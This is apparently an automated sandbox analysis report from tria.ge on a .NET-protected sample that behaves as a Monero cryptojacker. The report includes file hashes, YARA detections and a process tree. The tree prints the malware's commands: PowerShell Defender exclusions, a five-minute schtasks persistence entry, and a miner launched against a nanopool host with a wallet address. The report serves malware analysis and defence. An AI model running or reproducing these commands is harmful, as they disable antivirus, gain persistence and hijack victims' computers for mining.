Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
50s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
01/07/2023, 08:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230621-en
General
-
Target
file.exe
-
Size
1.3MB
-
MD5
07176d129de6501a6c733701ce76fd4e
-
SHA1
20837ae94fffc7cc9df911f7d0ed23cc9c877007
-
SHA256
89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699
-
SHA512
8f6325a244181b04f29d301249aa7184d582546ecf35bf00a3fd3c34219464e9bc91be42e9a87177eea9c541df494b1ad77f2f0294b741a8f5c92a570a765465
-
SSDEEP
12288:pG1mg2jJvz/oxbDXR4Nd9YWYaV+lmI0GNHXzvxkMHafenJ34mUw5G3riXcYwbY2p:pqmLFoP4Nr2H10m0GxKLjSKio
Malware Config
Signatures
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/3032-210-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-211-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-212-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-214-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-215-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-216-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-217-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-218-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3032-221-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/4464-133-0x0000000000660000-0x00000000007B2000-memory.dmp net_reactor behavioral2/files/0x0002000000023107-176.dat net_reactor behavioral2/files/0x0002000000023107-177.dat net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation RKGME.exe -
Executes dropped EXE 1 IoCs
pid Process 1508 RKGME.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4784 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1064 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3044 powershell.exe 1768 powershell.exe 1768 powershell.exe 3044 powershell.exe 3100 powershell.exe 4032 powershell.exe 3100 powershell.exe 4032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4464 file.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1508 RKGME.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 4032 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4464 wrote to memory of 3044 4464 file.exe 90 PID 4464 wrote to memory of 3044 4464 file.exe 90 PID 4464 wrote to memory of 1768 4464 file.exe 87 PID 4464 wrote to memory of 1768 4464 file.exe 87 PID 4464 wrote to memory of 1964 4464 file.exe 101 PID 4464 wrote to memory of 1964 4464 file.exe 101 PID 1964 wrote to memory of 1064 1964 cmd.exe 103 PID 1964 wrote to memory of 1064 1964 cmd.exe 103 PID 1964 wrote to memory of 1508 1964 cmd.exe 104 PID 1964 wrote to memory of 1508 1964 cmd.exe 104 PID 1508 wrote to memory of 3100 1508 RKGME.exe 105 PID 1508 wrote to memory of 3100 1508 RKGME.exe 105 PID 1508 wrote to memory of 4032 1508 RKGME.exe 106 PID 1508 wrote to memory of 4032 1508 RKGME.exe 106 PID 1508 wrote to memory of 4596 1508 RKGME.exe 109 PID 1508 wrote to memory of 4596 1508 RKGME.exe 109 PID 4596 wrote to memory of 4784 4596 cmd.exe 111 PID 4596 wrote to memory of 4784 4596 cmd.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2E05.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1064
-
-
C:\ProgramData\BackUp\RKGME.exe"C:\ProgramData\BackUp\RKGME.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"5⤵
- Creates scheduled task(s)
PID:4784
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵PID:3032
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
641.0MB
MD580e3a09765ed43fa99d4dd849dd62d14
SHA1c1758b249086e0d564c4bc04d567d86916f9ab27
SHA256263a210ec8b285400f20f0f0ff509d99e473a0dce30d2670547e19004b2286d8
SHA512ffc640207ac9aca44adfd55c94e32be477d0a23d18bd57af35ba22e96aa9f0f5872b840f6175bce0640d6772010b1c704905470de040d501e88fb501cb843259
-
Filesize
640.4MB
MD56d35ba9bbcb869791e5b166e160292d9
SHA1781e4e3ff1854dee7f5dfacfacf87bd26d88008e
SHA25689af2f6e335a6818e26d2b7cd837d7d34fded03f7b95e003cebdbd9bfe5a27d2
SHA5125b723d81476ef6beb8375ea8cd2fdd18ff0c4ff68fc2be5491e7a05e1b1f5fe06b60a8d6c5394da1494990498e49316814554a6eb3a78b6e85942888c40ab71c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
140B
MD518683f7cccb048714b72022b9194dcf3
SHA1e9a0409c55596e6af46179f27953c8a162f29b28
SHA25628008c547d1737a2954ecd94c401dd32b99b3414d0f3ba17b536253917e19b7e
SHA5127479bbc809c2e4261aba67056ce34396999827082ed7770d0b2778a7ac8ac3432255ac076e567b970b254210aef5e88114ebeeb1511275f3ca2f6d3fbe1947f7